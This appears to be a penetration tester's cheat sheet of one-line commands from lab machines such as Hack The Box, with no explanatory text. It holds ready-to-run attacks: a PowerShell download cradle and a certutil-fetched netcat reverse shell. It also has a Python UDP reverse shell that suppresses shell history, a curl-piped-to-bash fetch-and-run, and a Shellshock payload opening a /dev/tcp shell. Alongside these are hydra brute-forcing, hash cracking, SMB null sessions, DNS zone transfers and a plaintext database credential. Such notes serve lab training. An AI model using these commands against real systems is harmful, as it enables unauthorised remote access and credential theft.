smbclient -L 10.10.10.134 -U " "%" "
smbclient -N -L //10.10.10.125
Hidden streams
- List files with streams:
dir \R
- Read a stream from command line:
more < FileName:StreamName
wmic service where started=true get name, startname
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.3:8000/Invoke-PowerShellTcp.ps1')
cmd.exe /C net use /D /Y * && cmd.exe /C certutil.exe -urlcache -split -f 'http://10.10.16.65/nc.exe' C:\Users\Public\nc.exe & C:\Users\Public\nc.exe 10.10.16.65 1234 -e powershell.exe
cat /proc/1/cgroup
dig axfr @10.10.10.52 matis.htb
wget -r --no-passive ftp://10.10.10.106
- socat file:`tty`,echo=0,raw udp-listen:4444
import subprocess;subprocess.Popen(["python", "-c", 'import os;import pty;import socket;s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);s.connect((\"10.10.16.28\", 1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(\"HISTFILE\",\"/dev/null\");pty.spawn(\"/bin/sh\");s.close()'])
bash <(curl -s http://mywebsite.com/myscript.txt)
find / -type f -name "filename" 2>&1 | grep -v "Permission denied
getcap -r / 2>/dev/null
修改 private key 权限,chmod 4000
mssqlclient.py reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
SELECT name FROM master.sys.databases
echo | openssl s_client -showcerts -servername 10.10.10.124 -connect 10.10.10.124:443 2>/dev/null | openssl x509 -inform pem -noout -text
snmpwalk -v 2c -c public 10.10.10.65
- apt install snmp-mibs-downloader
- comment out mibs in
/etc/snmp/snmap.conf
cewl -w cewl-forum.txt -e -a http://gorum.bart.htb
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!" -Vv -f
hydra 10.10.10.43 -l whatever -P /opt/SecLists/Passwords/darkweb2017-top10000.txt https-post-form "/db/:password=^PASS^&remember=yes&login=log+in&proc_login=true:Incorrect password." -Vv -s 443
/opt/john/run/7z2john.pl backup.7z > backup.hash
hashcat -m 11600 -a 0 -o backup.cracked backup.hash /usr/share/wordlists/rockyou.txt --force
wfuzz -w /opt/SecLists/Discovery/DNS/subdomains-top1mil-110000.txt -u http://10.10.10.120/ -H 'Host: FUZZ.chaos.htb' --hh 73 --hc 400
nmap -p 389 --script ldap-search 10.10.10.119
tcpdump -i tun0 icmp
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.15.98/7777 0>&1 " http://10.10.10.56:80/cgi-bin/user.sh